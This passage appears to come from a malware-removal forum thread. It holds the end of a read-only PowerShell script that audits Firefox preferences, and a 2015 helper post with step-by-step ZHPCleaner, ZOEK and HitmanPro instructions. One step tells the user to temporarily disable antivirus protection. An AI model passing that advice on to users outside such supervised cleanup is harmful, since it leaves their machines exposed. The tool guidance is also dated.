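$ffProfiles = Join-Path $env:APPDATA 'Mozilla\Firefox\Profiles'
foreach ($prefsJs in Get-ChildItem -Path $ffProfiles -Filter prefs.js -Recurse -ErrorAction SilentlyContinue) {
    foreach ($line in Get-Content -LiteralPath $prefsJs.FullName) {
        if ($line -match '^user_pref\("([^"]+)",\s*(.*)\);\s*$') {
            # Copy the captures before any further -match overwrites $Matches.
            $prefName, $prefValue = $Matches[1], $Matches[2]
            if ($prefName -match $watch) { Add-Finding 'Firefox' $prefName $prefValue }
        }
    }
}

$findings | Sort-Object Area, Entry | Format-Table -AutoSize -Wrap
```

Run it once before the cleanup tools and once after the reboot and diff the two outputs; an IE entry whose target is "file missing" or whose signature is not Valid, a ProxyServer or AutoConfigURL you did not set, or a Chrome extension with from_webstore=False are the rows to read first. The script changes nothing, so it is safe to run as often as needed while a helper is still working the thread.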



#15 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:16 PM

Posted 13 April 2015 - 01:36 AM

Hi,

Let me take a closer look.

STEP 1

Please download ZHPCleaner (by NicolasCoolman) to your desktop.

  • Double click on ZHPCleaner to run the tool. (Vista/Windows 7/8 users right-click and select Run As Administrator).
  • Please click the first button (button image not preserved).
  • Then press the second button (button image not preserved).
  • During the scan any open instances of the browsers will be closed automatically.
  • A logfile will automatically open after the scan has finished.
  • Please post the contents of that logfile with your next reply.

STEP 2

Please download ZOEK (by Smeenk) and save it to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection. See here on how to do this.

  • Right-click on the ZOEK icon and select Run as Administrator to start the tool.
  • Wait patiently until the main console appears; it may take a minute or two.
  • In the main box please paste in the following script:

createsrpoint;
chromelook;
emptyCHRcache;
firefoxlook;
emptyFFcache;
FFdefaults;
emptyIEcache;
iedefaults;
shortcutfix;
selectgo;a
selectgo;z

  • Make sure that the Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in Notepad.
  • If a reboot is needed, it will be opened after it. You may also find it on your main drive (usually the C:\ drive).
  • Post its content into your next reply.

STEP 3

1. Please download HitmanPro.

  • For 32-bit Operating System: download link (a mirror is also given).
  • For 64-bit Operating System: download link (a mirror is also given).

2. Launch the program by double clicking on the HitmanPro icon. (Windows Vista/7 users right click on the HitmanPro icon and select Run as administrator).

Note: If the program won't run, open the program while holding down the left CTRL key until the program is loaded.

3. Click on the Next button. You must agree with the terms of the EULA (if asked).

4. Check the box beside "No, I only want to perform a one-time scan to check this computer".

5. Click on the Next button.

6. The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7. When the scan is done, click on the drop-down menu of the found entries (if any) and choose Apply to all => Ignore <= IMPORTANT!!!

8. Click on the Next button.

9. Click on the "Save Log" button.

10. Save that file to your desktop and post the content of that file in your next reply.

Note: if there isn't a drop-down menu when the scan is done, then please don't delete anything and close HitmanPro.

Navigate to C:\ProgramData\HitmanPro\Logs, open the report and copy and paste it to your next reply.

Note: ProgramData is hidden by default. Please make sure that you can view all hidden files. Instructions on how to do this can be found here:
How to see hidden files in Windows

Regards,

Georgi

